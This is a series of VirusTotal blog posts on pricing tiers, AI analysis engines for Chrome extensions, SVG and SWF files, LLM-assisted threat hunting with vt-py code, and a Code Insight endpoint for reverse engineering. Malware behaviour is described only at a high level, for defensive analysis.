Today, Google Threat Intelligence offers new ways to access advanced and curated threat intelligence, powered by the combined intelligence of VT, Mandiant and Google. As part of this broader evolution, we’re making sure VT remains open and transparent, while offering flexible options that meet the needs of our diverse users, from security researchers and startups to MSSPs and other security vendors.

VT now offers simpler pricing with tiers optimized for our partner contributors and community. We’re also introducing a Contributor Tier, a dedicated model for our engine partners. It ensures continuous access to VT feeds, priority support, and early access to new features. This tier recognizes their essential role in keeping VirusTotal open, collaborative, and globally impactful.

Key Access Tiers
Tier For Who Key Features Annual Price
VT Community Individual researchers, academics, educators. File scanning, URL scanning, public API, community features. Free.
VT Contributor Technological partners contributing detection engines. Feed of blindspots for free and discounts based on contribution tiers. From free (feed of blindspots) upon program acceptance.
VT Lite Small teams, early-stage startups, small MSSPs, SMB. Non-commercial. Advanced search, YARA hunting, File downloading, Private API, Private Scanning. Low-moderate usage. From $5k for low API volumes.
VT Duet Large organizations. Full feature set, high API quota. Community Intelligence only. Based on number of affiliates covered and contribution level.

You’ll notice that security vendors who do not contribute detections are not included in these tiers, as we are reaffirming our long-standing 2016 commitment to a healthy community. We welcome any organization to become a contributor and join us in protecting the common good. If you want to contribute, please let us know.

While Google Threat Intelligence will continue to deliver advanced threat context for enterprise customers, VirusTotal will always remain the collaborative, transparent, and community-driven foundation.

Thank you for helping us make this possible. We’re here to build the next chapter with you, not just for you.

Bernardo Quintero
Founder of VirusTotal

Crowdsourced AI += Exodia Labs

1 October 2025 at 12:02

We’re adding a new specialist to VirusTotal’s Crowdsourced AI lineup: Exodia Labs, with an AI engine focused on analyzing Chrome extension (.CRX) files. This complements our existing Code Insight and other AI contributors by helping users better understand this format and detect possible threats.

What you get in VirusTotal

  • Second opinion for .CRX: Exodia Labs adds another AI analysis stream alongside Code Insight. It gives a fresh, independent view on the same sample type. Like all Crowdsourced AI engines, it’s meant to complement (not replace) traditional detections and human analysis.
  • Clear verdict in the UI: Each Exodia report includes a simple verdict (benign, suspicious, or malicious) to help you quickly spot risky extensions.
  • Searchable results in VT Intelligence: You can now use new operators to search and pivot across Exodia Labs results:
    • exodialabs_ai_verdict:malicious | suspicious | benign
    • exodialabs_ai_analysis:<keywords>

See it in action

Here are a few Exodia Labs AI report examples you can explore in VT:

31da559ae4af91106e0a18740d6bb8916e2017f6a37a02ea2a8127f1da30ec77

69c926ea84536bdaba7e4f765bde65eb0199ac30be3a96729a21ea7efa48d721

You can also explore Exodia Labs verdicts at scale using VirusTotal Intelligence.

For example, the following query lists Chrome extensions flagged as malicious and related to financial activity: exodialabs_ai_verdict:malicious AND exodialabs_ai_analysis:financial


This search shows several .CRX files where Exodia Labs AI detected suspicious financial behavior.

Let’s look at two examples:

  • Westpac Extension: Exodia Labs flags it as malicious. The AI analysis shows the extension connects to a remote WebSocket server and exfiltrates cookies, one-time passwords, and payment tokens. It manipulates banking pages and forwards captured credentials to a C2, showing signs of credential theft and financial data tampering.
    34244257f633e104d06b0c4273caca96eb916d26540eeea68495707cbc920bdb

  • Spidy Extension: Also flagged as malicious. The analysis shows it requests
    718eab32b5597e479d63f1d4e6402b7844eb9a4ee01c9028e44eb202d5ebcb2f
    and cookies permissions, executes remote crawling jobs, and collects user profile and bank account details. The extension behaves like a data-exfiltration client handling financial credentials not mentioned in its public description.

About Exodia Labs

Exodia Labs builds AI-driven analysis for Chrome Web Store extensions, also exposing a browser add-on that lets users request an AI assessment directly from an extension’s store page and view a detailed report plus a verdict. For security teams, the same analysis powers the backend results we index in VirusTotal.

Join Crowdsourced AI

Crowdsourced AI is about aggregating independent AI solutions that explain behavior and provide judgments across many file types, helping you understand unfamiliar code faster and spot novel threats sooner. If you build AI solutions that can help the community, we want to hear from you.

Advanced Threat Hunting: Automating Large-Scale Operations with LLMs

30 September 2025 at 10:16

Last week, we were fortunate enough to attend the fantastic LABScon conference, organized by the SentinelOne Labs team. While there, we presented a workshop titled 'Advanced Threat Hunting: Automating Large-Scale Operations with LLMs.' The main goal of this workshop was to show attendees how they could automate their research using the VirusTotal API and Gemini. Specifically, we demonstrated how to integrate the power of Google Colab to quickly and efficiently generate Jupyter notebooks using natural language.

It goes without saying that the use of LLMs is a must for every analyst today. For this reason, we also want to make life easier for everyone who uses the VirusTotal API for research.

The Power of the VirusTotal API and vt-py

The VirusTotal API is the programmatic gateway to our massive repository of threat intelligence data. While the VirusTotal GUI is great for agile querying, the API unlocks the ability to conduct large-scale, automated investigations and access raw data with more pivoting opportunities.

To make interacting with the API even easier, we recommend using the vt-py library. It simplifies much of the complexity of HTTP requests, JSON parsing, and rate limit management, making it the go-to choice for Python users.

From Natural Language to Actionable Intelligence with Gemini

To bridge the gap between human questions and API queries, we can leverage the integrated Gemini in Google Colab. We have created a "meta Colab" notebook that is pre-populated with working real code snippets for interacting with the VirusTotal API to retrieve different information such as campaigns, threat actors, malware, samples, URLs among others (which we will share soon). This provides Gemini with the necessary context to understand your natural language requests and generate accurate Python code to query the VirusTotal API. Gemini doesn't call the API directly; it creates the code snippet for you to execute.

For Gemini to generate accurate and relevant code, it needs context. Our meta Colab notebook is filled with examples that act as a guide. For complex questions, it will be nice to provide the exact field names that you want to work with. This context generally falls into two categories:

  1. Reference Documentation: We include detailed documentation directly in the Colab. For example, we provide a comprehensive list of all available file search modifiers for the VirusTotal Intelligence search endpoint. This gives Gemini the "vocabulary" it needs to construct precise queries.
  2. Working Code Examples: The notebook is pre-populated with dozens of working vt-py code snippets for common tasks like retrieving file information, performing an intelligence search, or getting relationships. This gives Gemini the "grammar" and correct patterns for interacting with our API.

Example of code snippet context that we have included in our meta colab:

query_results_with_behaviors = []
query = "have:sigma have:yara have:ids have:malware_config fs:1d+ have:bundled_file tag:overlay"
RELATIONS = "behaviours"

async for itemobj in cli.iterator('/intelligence/search',params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): '\*'},limit=0):
    query_results_with_behaviors.append(itemobj.to_dict())

res_with_behaviors = list(query_results_with_behaviors)
Diagram showing the flow from User's Action to Actionable Intelligence via Gemini and VirusTotal API

Practical Example: Hunting for Malicious LNK Files

One of the exercises in our workshop focused on analyzing malicious LNK files submitted to VirusTotal in a specific period of time to limit results. The goal was to discover common execution techniques and interesting command-line patterns.

Here’s how you could approach this with natural language queries in our meta Colab:

1. Retrieve all LNK file objects matching the criteria.

You can start by asking Gemini:

Create a code snippet to retrieve all LNK files submitted from January 1st, 2025, until April 1st, 2025, with 5 or more positives.

Code generated:

query_results = []

# Query for LNK files submitted between January 1st, 2025, and April 1st, 2025, with 5 or more positives.
query = "fs:2025-01-01+ fs:2025-04-01- p:5+ type:lnk"

async for itemobj in cli.iterator('/intelligence/search',params={'query': "%s"%(query)},limit=0):
    query_results.append(itemobj.to_dict())

lnk_files = list(query_results)
print(f"Found {len(lnk_files)} LNK files matching the criteria.")

2. Flatten the data and visualize it.

Next, you can ask Gemini to process the retrieved data and create visualizations:

Flatten the data in a dataframe and create a bar chart depicting the most common TargetFileDOSName values.

Code generated:

import pandas as pd
import plotly.express as px

# Extract the 'attributes' dictionary from each object in our results
attributes_list = [result.get('attributes', {}) for result in lnk_files]

# Use json_normalize to create a flat DataFrame
df_flat = pd.json_normalize(attributes_list)

# Check if 'exiftool.TargetFileDOSName' column exists and is not empty
if 'exiftool.TargetFileDOSName' in df_flat.columns and not df_flat['exiftool.TargetFileDOSName'].empty:
    # Count the occurrences of each TargetFileDOSName
    target_file_counts = df_flat['exiftool.TargetFileDOSName'].value_counts().reset_index()
    target_file_counts.columns = ['TargetFileDOSName', 'Count']

    # Get the top 10 most common TargetFileDOSName values for visualization
    top_target_files = target_file_counts.head(10)

    # Create an interactive bar chart
    fig = px.bar(top_target_files,
                 x='Count',
                 y='TargetFileDOSName',
                 orientation='h',
                 title='Top 10 Most Common TargetFileDOSName in LNK files',
                 labels={'Count': 'Number of Occurrences', 'TargetFileDOSName': 'Target File DOS Name'})
    fig.show()
else:
    print("The 'exiftool.TargetFileDOSName' column was not found or is empty in the flattened data.")

print("DataFrame shape:", df_flat.shape)
df_flat.head()

This will generate a code snippet using pandas and Plotly to give you a clear view of the most frequent target files in the malicious LNKs.

3. Visualize relationships with a Sankey diagram.

To dig deeper and understand the relationships between the infected machines and the malware, you can ask for a more advanced visualization:

Create a Sankey diagram connecting MachineID (source) to TargetFileDOSName (target), with link widths representing the number of occurrences. Include only MachineID values with 10 or more occurrences, grouping the rest as "Other", and make the visualization interactive with hover details.

Code generated:

import plotly.graph_objects as go
import pandas as pd

# Ensure df_flat is available from previous steps
# If not, you might need to re-run the cell that creates df_flat.

# Check if necessary columns exist in df_flat
if 'lnk_info.machine_id' in df_flat.columns and 'exiftool.TargetFileDOSName' in df_flat.columns:

    # Calculate the frequency of each machine ID and target file name pair
    pair_frequencies = df_flat.groupby(['lnk_info.machine_id', 'exiftool.TargetFileDOSName']).size().reset_index(name='frequency')

    # Identify MachineIDs with less than 10 occurrences
    machine_id_counts = pair_frequencies.groupby('lnk_info.machine_id')['frequency'].sum().reset_index(name='count')
    other_machine_ids = machine_id_counts[machine_id_counts['count']  {row['exiftool.TargetFileDOSName']}: {row['frequency']}", axis=1)
        )
    )])

    fig.update_layout(title_text="MachineID to TargetFileDOSName Sankey Diagram (Infrequent MachineIDs grouped as 'Other')", font_size=10)
    fig.show()
else:
    print("Required columns 'lnk_info.machine_id' or 'exiftool.TargetFileDOSName' not found in the DataFrame.")

This will create a powerful visualization that shows how different machines are being targeted with specific files, allowing us identify patterns for each machineID metadata.

Sankey diagram

4. Analyze the behavior of the LNK files.

Finally, you can investigate the behavior of the LNK files themselves, for example, by looking at how they are executed:

Create a pie chart depicting the distribution of window behaviors for LNK target processes (hidden, minimized,...).

Code generated:

import plotly.express as px
import pandas as pd

# Check if the relevant column exists
if 'lnk_info.header.show_window_str' in df_flat.columns and not df_flat['lnk_info.header.show_window_str'].empty:
    # Count the occurrences of each window behavior string
    window_behavior_counts = df_flat['lnk_info.header.show_window_str'].value_counts().reset_index()
    window_behavior_counts.columns = ['Window Behavior', 'Count']

    # Create an interactive pie chart
    fig = px.pie(window_behavior_counts,
                 names='Window Behavior',
                 values='Count',
                 title='Distribution of LNK Target Process Window Behaviors',
                 hover_data={'Count': True})
    fig.show()
else:
    print("The 'lnk_info.header.show_window_str' column was not found or is empty in the flattened data. Cannot create the pie chart.")
Pie chart of window behaviors

This allows you to quickly identify if the LNK files are trying to hide their execution, a common use case for malware.

5. Geographic Threat Mapping of Submissions

Understanding the geographical distribution of malware submissions can provide crucial insights into whether a campaign is widespread or targeting a specific region. By analyzing the submission metadata for our set of LNK files, an analyst can quickly identify potential hotspots, which could indicate a geographically focused attack. This is achieved by fetching the submissions relationship for each file, extracting the country of origin for each submission, and plotting this data on a world map (please note that submissions doesn’t mean targeted countries, but in some cases could be related).

Using the LNK files identified previously, create a code snippet that retrieves the submissions relationship for each file. Then, count the number of submissions from each country and display the results on a choropleth world map to visualize the submission hotspots.

In this case, Gemini uses the step-by-step execution, which basically is a set of consecutive executions. The code generated was:

Step 1
query_results_with_submissions = []

# Define the search query string for LNK files
query = "fs:2025-01-01+ fs:2025-04-01- p:5+ type:lnk"

# Define the relationship to request
RELATIONS = "submissions"

# Define the relationship attributes to retrieve (all attributes)
ATTRIBUTES_RELATIONS = "*"

# Use cli.iterator to perform an intelligence search with the specified query, relationships, and relationship attributes.
async for itemobj in cli.iterator('/intelligence/search', params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): ATTRIBUTES_RELATIONS}, limit=0):
    query_results_with_submissions.append(itemobj.to_dict())

# Convert query_results_with_submissions to a list called lnk_files_with_submissions
lnk_files_with_submissions = list(query_results_with_submissions)

# Print the number of LNK files found with submission data.
print(f"Found {len(lnk_files_with_submissions)} LNK files with submission data matching the criteria.")
Step 2
import pandas as pd

# Initialize an empty list to store submission countries
submission_countries = []

# Iterate through each item (LNK file) in the lnk_files_with_submissions list
for item in lnk_files_with_submissions:
    # Check if 'relationships' and 'submissions' exist and are not empty
    if 'relationships' in item and 'submissions' in item['relationships'] and item['relationships']['submissions']['data']:
        # Iterate through each submission object
        for submission in item['relationships']['submissions']['data']:
            # Extract the 'country' from 'submission['attributes']' and append it to the list
            if 'country' in submission['attributes']:
                submission_countries.append(submission['attributes']['country'])

# Convert the submission_countries list into a pandas Series
submission_countries_series = pd.Series(submission_countries)

# Count the occurrences of each country and store in a DataFrame
country_counts = submission_countries_series.value_counts().reset_index()
country_counts.columns = ['country', 'count']

print(f"Total unique countries found: {len(country_counts)}")
print("Top 5 submission countries:")
print(country_counts.head())
Step 3
!pip install pycountry
import plotly.express as px
import pandas as pd
import pycountry

# Function to get ISO-3 code from country name
def get_iso3(country_name):
    try:
        return pycountry.countries.search_fuzzy(country_name)[0].alpha_3
    except:
        return None

# Apply the function to get ISO-3 codes
country_counts['iso_alpha'] = country_counts['country'].apply(get_iso3)

# Create a world heatmap using Plotly Express with ISO-3 codes
fig = px.choropleth(country_counts.dropna(subset=['iso_alpha']), # Drop rows where ISO code couldn't be found
                      locations="iso_alpha", # Use ISO-3 codes for locations
                      locationmode='ISO-3',   # Specify ISO-3 location mode
                      color="count",
                      hover_name="country",
                      color_continuous_scale="Viridis",
                      title="Submission Country Heatmap")

# Update layout to increase figure size
fig.update_layout(
    autosize=False,
    width=1000, # Adjust width as needed
    height=600 # Adjust height as needed
)

fig.show()
World heatmap of submissions

More Examples

Here are some other examples of how you can use natural language to query the VirusTotal API:

  • Find malicious Chrome extensions (based on this blog):

This specific question is actually a really good example of how Google Colab will run the step-by-step process. As you can see, we asked different questions in the same prompt, for that reason Gemini will do it in different steps.

Retrieve all the samples from the /intelligence/search endpoint with the following query: fs:2025-08-01+ fs:2025-08-14- p:5+ tag:crx have:codeinsight.

Get the bundled_files and create a new dataframe with them too, but store only those having 5 or more malicious value.

Then identify the top 5 magika of those bundled files obtained

Code generated:

Step 1
query_results_with_bundled_files = []

# Define the search query string
query = "fs:2025-08-01+ fs:2025-08-14- p:5+ tag:crx have:codeinsight"

# Define the relationship to request
RELATIONS = "bundled_files"

# Define the relationship attributes to retrieve (all attributes)
ATTRIBUTES_RELATIONS = "*"

# Use cli.iterator to perform an intelligence search with the specified query, relationships, and relationship attributes.
async for itemobj in cli.iterator('/intelligence/search', params={'query': query, 'relationships': RELATIONS, 'relationship_attributes[%s]'%(RELATIONS): ATTRIBUTES_RELATIONS}, limit=0):
    query_results_with_bundled_files.append(itemobj.to_dict())

# Convert query_results_with_bundled_files to a list called crx_files_with_bundled_files
crx_files_with_bundled_files = list(query_results_with_bundled_files)

# Print the number of found CRX files with bundled file data.
print(f"Found {len(crx_files_with_bundled_files)} CRX files with bundled file data matching the criteria.")
Step 2
import pandas as pd

# List to store all bundled file attributes
all_bundled_files_data = []

# Iterate through each CRX file with bundled file data
for crx_file in crx_files_with_bundled_files:
    if 'relationships' in crx_file and 'bundled_files' in crx_file['relationships']:
        for bundled_file in crx_file['relationships']['bundled_files']['data']:
            all_bundled_files_data.append(bundled_file.get('attributes', {}))

# Create a DataFrame from the extracted bundled file attributes
df_bundled_files = pd.json_normalize(all_bundled_files_data)

# Filter for bundled files with 5 or more malicious detections
df_malicious_bundled_files = df_bundled_files[df_bundled_files['last_analysis_stats.malicious'] >= 5]

print(f"Total bundled files extracted: {len(df_bundled_files)}")
print(f"Bundled files with 5 or more malicious detections: {len(df_malicious_bundled_files)}")

df_malicious_bundled_files.head()
Step 3
import pandas as pd
import plotly.express as px

# Check if the 'magika' column exists and is not empty in the filtered DataFrame
if 'magika' in df_malicious_bundled_files.columns and not df_malicious_bundled_files['magika'].empty:
    # Count the occurrences of each magika type
    magika_counts = df_malicious_bundled_files['magika'].value_counts().reset_index()
    magika_counts.columns = ['Magika Type', 'Count']

    # Get the top 5 most frequent magika types
    top_5_magika = magika_counts.head(5)

    print("Top 5 Magika Types in malicious bundled files:")
    print(top_5_magika)

    # Visualize the top 5 magika types
    fig = px.bar(top_5_magika,
                 x='Count',
                 y='Magika Type',
                 orientation='h',
                 title='Top 5 Magika Types in Malicious Bundled Files',
                 labels={'Count': 'Number of Occurrences', 'Magika Type': 'Magika Type'}) 
    fig.update_layout(yaxis={'categoryorder':'total ascending'}) # Order bars by count
    fig.show()
else:
    print("The 'magika' column was not found or is empty in the filtered malicious bundled files DataFrame. Cannot identify top magika types.")
  • Retrieve threat actors:
Retrieve threat actors targeting the United Kingdom with an espionage motivation. Sort the results in descending order of relevance. Display the total number of threat actors and their names.
  • Investigate campaigns:
Retrieve information about threat actors and malware involved in campaigns targeting Pakistan. For each threat actor, retrieve its country of origin, motivations, and targeted industries. For each malware, retrieve its name.

What’s next

This workshop, co-authored with Aleksandar from Sentinel LABS, will be presented at future conferences to show the community how to get the most out of the VirusTotal API. We'll be updating the content of our meta colab regularly and will share more information soon about how to get the Google Colab.

In the meantime, if you have any feedback or ideas to contribute, we are open to suggestions.

Supercharging Your Threat Hunts: Join VirusTotal at Labscon for a Workshop on Automation and LLMs

5 September 2025 at 11:53
We are excited to announce that our colleague Joseliyo Sánchez, will be at Labscon to present our workshop: Advanced Threat Hunting: Automating Large-Scale Operations with LLMs. This workshop is a joint effort with SentinelOne and their researcher, Aleksandar Milenkoski. 

In today's rapidly evolving threat landscape, security professionals face an overwhelming tide of data and increasingly sophisticated adversaries. This hands-on workshop is designed to empower you to move beyond the traditional web interface and harness the full potential of the VirusTotal Enterprise API for large-scale, automated threat intelligence and hunting. 

We will dive deep into how you can use the VirusTotal Enterprise API with Python and Google Colab notebooks to automate the consumption of massive datasets. You'll learn how to track the behaviors of advanced persistent threat (APT) actors and cybercrime groups through practical, real-time exercises. 

A key part of our workshop will focus on leveraging Large Language Models (LLMs) to supercharge your analysis. We'll show how you can use AI to help understand complex data, build better queries, and create insightful visualizations to enrich your information for a deeper understanding of threats. 

This session is ideal for cyber threat intelligence analysts, threat hunters, incident responders, SOC analysts, and security researchers looking to automate and scale up their threat hunting workflows. 

After the workshop, we will publish a follow-up blog post that will delve deeper into some of the exercises and examples presented, providing a valuable resource for further learning and implementation. 

We look forward to seeing you at Labscon! 

(All of the scenarios are compatible with Google Threat Intelligence)

 ---- 
Conference website: https://www.labscon.io/ 
Date: September 17-20, 2025 
Registration: Invite-Only 
Place: Scottsdale, Arizona 
Duration: 3-5h

Uncovering a Colombian Malware Campaign with AI Code Analysis

4 September 2025 at 14:36

VirusTotal Code Insight keeps adding new file formats. This time, we’re looking at two vector-based formats from very different eras: SWF and SVG. Curiously, right after we rolled out this update in production, one of the very first submitted files gave us a perfect, and unexpected, example of Code Insight in action: it uncovered an undetected malware campaign using SVG files that impersonated the Colombian justice system.

Audio version of this post, created with NotebookLM Deep Dive

SWF: a blast from the past

Flash is dead, Adobe killed it in 2020 and browsers stopped supporting it shortly after. But surprisingly, SWF files still show up on VirusTotal. Whether it’s old malware resurging, retro hunting, or long-tail campaigns, they haven’t disappeared completely.

In fact, VirusTotal received 47,812 unique SWF files in the last 30 days that had never been seen before, and 466 of them were flagged as malicious by at least one antivirus engine.

SWF files are binary and compiled. That means Code Insight needs to:

  • Unpack and decompress the container (often zlib or LZMA)
  • Parse the internal tag structure
  • Extract embedded scripts, either ActionScript 2 (AVM1) or ActionScript 3 (AVM2 bytecode + decompiling/disassembling)

Once we lift those scripts into something closer to pseudocode or readable disassembly, the LLM steps in to summarize what the file is doing and why it might be suspicious.

SVG: modern, open, and still abusable

SVGs, on the other hand, are very much alive. It’s a standard web format, open, text-based, and everywhere: websites, design tools, build systems. And that’s also why attackers like it.

In the last 30 days alone, VirusTotal received 140,803 unique SVG files that had never been seen before, and 1,442 of them were flagged as malicious by at least one antivirus engine. That's roughly 1% showing up with detections, just like SWF curiously.

SVG is just XML with <svg> at the root. If it’s a .svgz, we decompress it first. From there, Code Insight looks for:

  • Embedded JavaScript in <script> tags or event handlers (onload, onclick…)
  • Redirects using javascript: URLs or location.href
  • Obfuscation tricks (CDATA, character entities, base64 payloads, etc.)

Because SVG is plain text, the challenge isn’t unpacking, it’s spotting the malicious logic hiding in plain sight.

Let’s see a couple of examples:

When a SWF is flagged, but isn’t malicious

One common challenge in threat analysis is dealing with files that trigger detections in just a few antivirus engines. They’re not clean, but they’re not clearly malicious either. These gray areas force analysts to dig deeper, often wasting time chasing false positives.

The SWF file in the screenshot is a perfect example.

350422c3915a8a1a1336147f89061b25c8354af58db0050e2f9ef2b384e59f62

It was flagged by 3 out of 63 engines. Enough to raise doubts, but not conclusive. The detections mention known SWF heuristics and an old CVE.

Thanks to Code Insight, we can quickly understand what’s going on. It identifies the SWF as a complex ActionScript-based game, including 3D rendering, sound management, and a full level editor. The analysis also explains why the file might look suspicious: it uses obfuscated classes and cryptographic functions (like RC4 and AES), and gathers system details, techniques often associated with malware, but also common in Flash games to enforce DRM or prevent tampering.

The verdict? No malicious behavior was observed, and now we know why it looked suspicious in the first place.

This kind of context is exactly what Code Insight is designed for: saving time, reducing uncertainty, and helping you focus on real threats.


When AV misses, but Code Insight doesn’t

This second example shows the other side of the coin: a malicious SVG file that evaded all antivirus engines, going completely undetected on VirusTotal. On the surface, it looks clean, but a quick look with Code Insight tells a very different story.

1527ef7ac7f79bb1a61747652fd6015942a6c5b18b4d7ac0829dd39842ad735d

According to Code Insight: “This SVG file executes an embedded JavaScript payload upon rendering. The script decodes and injects a Base64-encoded HTML phishing page impersonating a Colombian government judicial system portal. To deceive the user, it simulates a file download with a progress bar, while in the background, it decodes a second, large Base64 string, which is a malicious ZIP archive, and forces its download.”

We validated this behavior by opening the sample in a controlled environment. As shown in the screenshots below, the fake portal is rendered exactly as described, simulating an official government document download process. The phishing site includes case numbers, security tokens, and visual cues to build trust, all of it crafted within an SVG file.


Despite its zero detections, this SVG hides two layers of abuse:

  • A convincing phishing lure, injected via inline JavaScript and decoded on-the-fly
  • A malware dropper, silently extracting and triggering the download of a ZIP file in the background

This is exactly the kind of threat Code Insight is meant to catch: well-crafted, script-based attacks that fly under the radar.

A deeper look: from one SVG to a full campaign

Curiously, the malicious SVG we highlighted earlier wasn’t just any random sample, it was one of the very first files submitted right after we deployed SVG support in Code Insight. A coincidence? Or were we seeing the tip of something bigger?

Thanks to VirusTotal Intelligence, we can search through our massive sample collection using hundreds of parameters, including queries that look inside Code Insight reports. So we ran:

type:svg AND codeinsight:"Colombian"


And voilà: 44 unique SVG files surfaced, all undetected by antivirus engines, but all flagged by Code Insight as part of the same phishing and malware campaign.

Diving into the source code of these SVGs, we found:

  • Code obfuscation techniques
  • Use of polymorphism, with slight changes in every file
  • And large amounts of dummy (garbage) code to increase entropy and evade static detection.

But Code Insight had no problem cutting through the noise.

One thing stood out: the attackers left Spanish-language comments in their scripts, with phrases like "POLIFORMISMO_MASIVO_SEGURO" and "Funciones dummy MASIVAS". While most of the code changed from sample to sample, those comments stayed exactly the same, a clear weakness, and a perfect signature for a simple YARA rule.


So we wrote a very basic one:


Running a retrohunt over the last year with this basic rule returned 523 matches.


Sorting by submission time, the first sample dates back to August 14, 2025, also submitted from Colombia, and also with 0 antivirus detections at the time.


We reanalyzed that first sample with the current version of Code Insight, and again, it produced an accurate description of the phishing page and malware dropper, impersonating the Colombian Fiscalía General de la Nación.

Looking deeper, we saw that the earliest samples were larger, around 25MB, and the size decreased over time, suggesting the attackers were evolving their payloads. Most importantly, the distribution vector was email, allowing us to pivot into delivery metadata: senders, subjects, attachment names, and more.


Final thoughts

SWF and SVG are very different formats from very different eras, but both can still cause headaches for analysts.

In the first case, Code Insight helped explain why a SWF file looked suspicious without actually being malicious. In the second, it uncovered malicious behavior in an SVG that had gone completely undetected.

This is where Code Insight helps most: giving context, saving time, and helping focus on what really matters. It’s not magic, and it won’t replace expert analysis, but it’s one more tool to cut through the noise and get to the point faster. And when Code Insight and VirusTotal Intelligence work together, one suspicious sample can become the key to revealing an entire campaign.

Integrating Code Insight into Reverse Engineering Workflows

28 August 2025 at 11:58
More than two years have passed since we announced the launch of Code Insight at RSA 2023. From that time on, we have been applying this technology in different scenarios, expanding its use in new file formats (12).

As we advance in the automated analysis of new files with Code Insight, we want to offer an alternative that enables the integration of this type of technology into the analysis of disassembled or decompiled code.


Audio version of this post, created with NotebookLM Deep Dive

To that end, we have created a new endpoint that receives code requests and returns a description of its functionality, highlighting the most relevant aspects for malware analysts. This endpoint can be used to query code blocks, chaining previous analyses with modifications or corrections made by the analyst. This significantly reduces the reverse engineering workload by providing the analyst with an assistant that pre-analyzes functions deemed interesting, acquiring knowledge as the analysis proceeds.

This endpoint can be integrated into any reverse engineering tool that processes disassembled or decompiled code. As an implementation example, the VirusTotal plugin for IDA Pro has been updated to support its use from the IDA interface. This offers a simple way to integrate relevant analyses into a notebook, allowing the analyst to keep responses that play a direct role in understanding how the code works.

Endpoint for reversed code queries

Using this new endpoint is quite simple—just make a request to the API as shown in the following example:

API_URL = 'https://www.virustotal.com'
endpoint = 'api/v3/codeinsights/analyse-binary'
headers_apiv3 = {
    'Accept': 'application/json',
    'Content-Type': 'application/json',
    'x-apikey': [API_KEY]
}

payload = {
    'code': [code_base64],
    'code_type' = ['disassembled'|'decompiled']
}

response = requests.post(f'{API_URL}/{endpoint}',
                         json = {'data': payload},
                         headers = headers_apiv3)


This Python code corresponds to a request to the endpoint located at ‘https://www.virustotal.com/api/v3/codeinsights/analyse-binary’, in which the code to be analyzed is included in the ‘payload’ variable as follows:

payload = {
    'code': code_base64,
    'code_type' = 'disassembled'|'decompiled'
    "history": [
        {
            "request": code_base64,
            "response": {
                            "summary": text,
                            "description": text,
                        },
        },
        {
            "request": code_base64,
            "response": {
                            "summary": text,
                            "description": text,
                        },
        },
    ]
}


The request is divided into two parts: the first includes the code being analyzed (‘code’ and ‘code_type’), and the second includes previous requests—potentially reviewed by the analyst—that provide context for analyzing the queried code.

This request will return a general description of how the submitted code snippet works ("summary") and, in addition, another text where it describes in more detail how these functionalities are carried out ("description"). In this way, the analyst can quickly check if the function contains any behavior that they consider interesting, and thus, review the execution steps or discard the function as irrelevant.

New version of the VT-IDA Plugin for IDA Pro

Along with this new endpoint, we have updated the VirusTotal plugin to show how this new functionality can be integrated into the analyst's workflow.

This new functionality can be used as follows:
  1. The analyst selects a function from the disassembled or decompiled code to be analyzed.
  2. If the response provided by the endpoint is satisfactory and reveals an interesting function, they can click ‘Accept’ to include it in a list of selected functions, which we call the ‘CodeInsight Notebook’. They can also make modifications to the ‘Summary’ and ‘Description’ fields to correct errors or add information that helps put the code in context.
  3. With each new request sent to the endpoint, all previously stored functions are included—along with any modifications made by the analyst. This allows for more accurate analyses based on previously obtained and reviewed results.
Here’s how the new version of the plugin would look after a few iterations on a malware sample:



A practical example

Let's illustrate the benefits of the new plugin with a practical example. Imagine an analyst needs to analyze a malicious binary file to understand its function. This is typically a time-consuming and complex process, but with the help of Code Insight, their workflow becomes significantly more efficient:

  1. Targeted Analysis: The analyst selects a code block they suspect might be malicious and uses the endpoint to get an automated analysis.

    The code shown below implements an anti-disassembly technique aimed at generating disassembled code that hides malicious functionality through a hidden jump to a memory address. Essentially, the resulting disassembled code is unreliable, as it doesn’t accurately represent the code that will actually be executed.



  2. Review and Refinement: At this point, a request is made to obtain an initial analysis of the code. The analyst reviews the response and can modify both the ‘Summary’ and ‘Description’ fields with their own notes or corrections.

  3. In this case, the obtained code analysis correctly identifies an anti-disassembly technique that modifies the return address. However, it does not provide information about a possible return address that would help the analyst locate the hidden code.

    At this point, the analyst can modify the output provided by the endpoint to explain how this technique works. This way, the acquired knowledge can be used in the analysis of other code blocks within the sample. To do so, the analyst simply needs to include the (reviewed) analysis in the list of analyzed functions by clicking the ‘Accept’ button.



  4. Iterative Analysis and Improved Results: The file analysis continues in such a way that, with each new request, the list of analyzed functions is sent—effectively representing the knowledge acquired from analyzing the code selected by the analyst.


And as shown in the previous image, this knowledge is used in other function queries that employ a technique similar to the one previously discussed—this time providing more details about how it works and alerting the analyst to the possibility of jumping to an address containing hidden code.

Quick Tips

The endpoint offers some interesting features for the analyst. For example, as shown in the following figure, the presence of strings written in languages other than English has been detected, providing a translation and pinpointing their location in memory.



On the other hand, while analyzing assembly code has its own pros and cons compared to decompiled code, we can gain additional benefits by analyzing a decompiled function whose disassembled code has been previously analyzed and stored in Code Insight Notebook.

For example, let's look at the decompiled code of a function previously analyzed in its disassembled version:


The image below illustrates how analyzing a decompiled function becomes richer with the help of the previously stored analysis of its disassembled code. This happens because certain features, like text strings, are visible in the disassembled code but often missing from the decompiled version.

As a result, Code Insight can provide a more concise and direct explanation by leveraging the decompiled view, which is supported by the disassembled code.



It is important to highlight that both the endpoint and this new feature of the plugin for IDA Pro are offered in trial mode, with the aim of involving the community in the progress we are making in its application to the field of reverse engineering. Although the results produced by this new functionality have been very positive during the testing phase, it is possible that the output generated by the endpoint may not be 100% accurate and could contain errors or omit some relevant details of the analysis.

We are confident that this new integration will be a great help to analysts who are gradually incorporating LLM model capabilities into their workflow. As we continue to harness the power of AI, your feedback is incredibly valuable to us. Stay connected for future updates, and thank you for your continued support.


Applying AI Analysis to PDF Threats

25 August 2025 at 18:08

In our previous post we extended VirusTotal Code Insights to browser extensions and supply-chain artifacts. A key finding from that analysis was how our AI could apply contextual knowledge to its evaluation. It wasn’t just analyzing code in isolation, it was correlating a package's stated purpose (its name and description) with its actual behavior, flagging malicious logic that contradicted its public description. We’re now applying the same idea to one of the most common file formats in the world, the PDF.


Audio version of this post, created with NotebookLM Deep Dive

